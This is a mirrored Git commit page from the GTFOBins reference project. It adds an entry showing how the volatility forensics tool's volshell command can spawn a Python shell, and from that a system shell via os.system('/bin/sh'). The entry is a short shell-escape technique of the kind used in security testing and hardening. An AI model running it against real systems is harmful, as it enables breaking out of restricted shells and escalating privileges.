1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-07 20:50:38 +02:00

Add volatility

Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
This commit is contained in:
Lemon 2022-02-19 08:33:17 -05:00 committed by GitHub
parent c32b82b5e9
commit c056acd2e2
Signed by: GitHub
GPG Key ID: 4AEE18F83AFDEB23

8
_gtfobins/volatility.md Normal file
View File

@ -0,0 +1,8 @@
---
description: This command requires some valid coredump file which, if not available, can be uploaded to the target. The `volshell` command spawns a [`python`](/gtfobins/python/) shell, other functions may apply.
functions:
shell:
- code: |
volatility -f file.dump volshell
__import__('os').system('/bin/sh')
---